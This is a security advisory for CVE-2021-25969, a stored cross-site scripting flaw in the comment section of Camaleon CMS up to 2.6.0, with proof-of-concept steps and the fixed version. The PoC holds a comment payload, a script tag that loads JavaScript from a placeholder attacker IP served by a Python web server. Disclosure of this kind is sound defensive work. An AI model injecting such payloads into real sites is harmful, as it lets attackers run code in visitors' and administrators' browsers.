CVE-2021-25969

Overview

In Camaleon CMS application, versions 0.0.1 to 2.6.0 are vulnerable to stored XSS, which allows an unauthenticated attacker to store malicious scripts in the comments section of the post. These scripts are executed in a victim’s browser when they open the page containing the malicious comment.

Details

The “Camaleon CMS” application is affected by a stored XSS vulnerability that allows unprivileged application users to store malicious scripts in the comments section of the post. These scripts are executed in a victim’s browser when they open the page containing the malicious comment.

PoC Details

Login to the application as administrator.
Go to Settings, General Site. Click on the configuration tab and enable the following options:
1. Register comments as approved
2. Allow anonymous comments
Then go to the Post section in the left menu under Contents sections and click All Items to show all the posts. Edit a post by clicking on the pencil icon and then check the “Allow Comments” option to allow comments on the post and click on the Update button.
Now open the application in incognito mode and navigate to the “/sample-post” endpoint to view the post. The option to provide comments can be seen at the end of the post.
As an attacker, create a file “test.js” containing a malicious script such as the one given below, and run a simple python server to serve the file. Create a new comment with the below given script.
Now any user visiting the post is affected. To confirm it, login again as administrator, visit the same post there, and notice that the admin is affected.

PoC Code

// Command to run the Python Simple Server to host the malicious file:
python3 -m http.server <port_number>
// Create a new comment with the following script: 
<script src="http://<attacker_ip>:<port>/test.js"></script>

// Contents of test.js:
alert(‘XSS’);

Affected Environments

Camaleon CMS versions 0.0.1 to 2.6.0

Prevention

Update to camaleon_cms version 2.6.0.1